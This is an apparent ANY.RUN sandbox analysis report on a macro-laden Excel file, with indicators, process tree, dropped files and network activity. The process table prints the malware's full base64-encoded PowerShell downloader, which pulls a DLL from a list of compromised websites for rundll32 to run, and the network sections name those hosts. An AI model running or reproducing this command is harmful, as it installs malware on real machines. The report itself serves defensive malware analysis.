File name:

2a689047a4d1bfab15ac22741c4b7b073e61fb85212bd124be0062b833f88b75

Full analysis: https://app.any.run/tasks/4b437809-d1de-4095-9a7e-10cf4cf842bb
Verdict: Malicious activity
Analysis date: December 13, 2024, 21:51:14
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: User, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:17:20 2015, Last Saved Time/Date: Wed Feb 2 17:50:11 2022, Security: 0
MD5:

DF83087B44EB6C636A2FA2FB43978D54

SHA1:

1D2256B397986D01071369ADBE3ADEB4BD89CE5E

SHA256:

2A689047A4D1BFAB15AC22741C4B7B073E61FB85212BD124BE0062B833F88B75

SSDEEP:

6144:VOY28G6cm86MpnN/BH6oOoawaPlTVLADrRiJnzDEY3WHZ1GOIo/oJnS:7wViJPN3yZ1GONoJnS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from MS Office

      • EXCEL.EXE (PID: 3612)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2996)
      • wscript.exe (PID: 6556)
      • wscript.exe (PID: 6296)
      • wscript.exe (PID: 6928)
      • wscript.exe (PID: 1572)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 2996)
      • wscript.exe (PID: 6556)
      • wscript.exe (PID: 6296)
      • wscript.exe (PID: 6928)
      • wscript.exe (PID: 1572)

    • The process executes VB scripts

      • EXCEL.EXE (PID: 3612)

    • Detected use of alternative data streams (AltDS)

      • EXCEL.EXE (PID: 3612)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5540)
      • cmd.exe (PID: 6608)
      • cmd.exe (PID: 6980)
      • cmd.exe (PID: 6244)
      • cmd.exe (PID: 396)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2996)
      • wscript.exe (PID: 6556)
      • wscript.exe (PID: 6928)
      • wscript.exe (PID: 6296)
      • wscript.exe (PID: 1572)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 5540)
      • cmd.exe (PID: 6608)
      • cmd.exe (PID: 6980)
      • cmd.exe (PID: 6244)
      • cmd.exe (PID: 396)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 5540)
      • cmd.exe (PID: 6608)
      • cmd.exe (PID: 6980)
      • cmd.exe (PID: 6244)
      • cmd.exe (PID: 396)

  • INFO

    • Reads mouse settings

      • EXCEL.EXE (PID: 3612)

    • Creates files in the program directory

      • EXCEL.EXE (PID: 3612)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • EXCEL.EXE (PID: 3612)

    • The process uses the downloaded file

      • wscript.exe (PID: 2996)
      • EXCEL.EXE (PID: 3612)
      • wscript.exe (PID: 6556)
      • wscript.exe (PID: 6928)
      • wscript.exe (PID: 6296)
      • wscript.exe (PID: 1572)

    • Reads Internet Explorer settings

      • powershell.exe (PID: 3040)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 2972)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 2972)

    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 3040)

    • Disables trace logs

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 2972)

    • Checks proxy server information

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 4944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

CompObjUserType: ???? Microsoft Office Excel 2003
CompObjUserTypeLen: 33
HeadingPairs:
  • Листы
  • 1
TitleOfParts: Sheet1
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2022:02:02 17:50:11
CreateDate: 2015:06:05 18:17:20
Software: Microsoft Excel
LastModifiedBy: 1
Author: User
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
158
Monitored processes
36
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs rundll32.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rundll32.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rundll32.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rundll32.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3612"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\admin\Desktop\2a689047a4d1bfab15ac22741c4b7b073e61fb85212bd124be0062b833f88b75.xlsC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
2996wscript c:\programdata\wetidjks.vbsC:\Windows\System32\wscript.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5540C:\WINDOWS\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
5032\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3040powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0AC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6432"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresdC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
6440\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6496c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresdC:\Windows\SysWOW64\rundll32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
6556wscript c:\programdata\wetidjks.vbsC:\Windows\System32\wscript.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6608C:\WINDOWS\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
Total events
38 856
Read events
38 600
Write events
235
Delete events
21

Modification events

(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01D014000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3612
Operation:writeName:0
Value:
0B0E10276106308273D040AFB4A4EE1C56D077230046D18C8FD892B5D3ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C5119C1CD2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
2
(PID) Process:(3612) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:pt-br
Value:
2
Executable files
1
Suspicious files
14
Text files
16
Unknown types
0

Dropped files

PID
Process
Filename
Type
3612EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.Sbinary
MD5:4B73B97A32FE50F651991C98CC376AF2
SHA256:33AD294E59C5BE5C658254AF5A2F57A22B6597D7DEA8F384D2E7159340F53711
3612EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AF376BB0-34F6-4A48-99DF-D5518996C2BCxml
MD5:04A48B5F3A67F8492E5E1C5F7111CD84
SHA256:1DA489E2A146769BAC50DC29F66D9409E7AB1B895F2FFC4864976BEDDC62B82E
3612EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:D858D374AF60DF3220AB5DB3108D1834
SHA256:08378DA7559BBB53B9ECCB1B91E1FDA2D42F9400F559D28B3284545093306D6D
3040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v1ptieop.nor.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3612EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\2a689047a4d1bfab15ac22741c4b7b073e61fb85212bd124be0062b833f88b75.xls.LNKbinary
MD5:90EC0B10217902AEB3A0BAD1E3376907
SHA256:E9DE359EC16463B50BC4ECBEB44781E8EFB69CBBE3D9F8E881B4AF2F14D7614F
3612EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\microsoft.office.smartlookup.ssr.jsbinary
MD5:BC749DE3CC12B1FA311B7DE9A2933667
SHA256:12C1084BC4CA1D226C53B73CC7C53E451F5E0540D0BD527066B39EA9DE90B4C7
3612EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HC5GN6LD0YIR9CDSSK3I.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
3040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_t3nalt3y.lkv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3612EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-msbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
3612EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:419A67890DAB7370D6B56F8341BDBDBA
SHA256:6403C590BD9A8F0A836B3C0A15C4882C583196FD6871F8674B4007BA3825EC71
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
32
DNS requests
26
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
301
34.149.87.45:443
https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/
unknown
GET
301
151.106.124.14:443
https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/
unknown
3568
svchost.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
HEAD
200
23.32.100.39:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
POST
200
40.79.197.34:443
https://self.events.data.microsoft.com/OneCollector/1.0/
unknown
whitelisted
GET
404
34.149.87.45:443
https://www.trasix.com/wp-admin/y5Aa1jt0Sp2Qk
unknown
html
2.89 Kb
GET
200
23.32.100.39:443
https://uci.cdn.office.net/mirrored/smartlookup/current/main_ssr.html
unknown
html
396 Kb
whitelisted
GET
200
23.32.100.39:443
https://uci.cdn.office.net/mirrored/smartlookup/current/dictionary_words_bloom_filter.data
unknown
binary
117 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.168.100.255:137
whitelisted
3568
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
69.192.161.161:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3568
svchost.exe
69.192.161.161:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3568
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.174
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 69.192.161.161
whitelisted
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
actividades.laforetlanguages.com
unknown
sbcopylive.com.br
unknown
trasix.com
  • 185.230.63.107
unknown
ecs.office.com
  • 52.113.194.132
whitelisted
www.trasix.com
  • 34.149.87.45
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
2a689047a4d1bfab15ac22741c4b7b073e61fb85212bd124be0062b833f88b75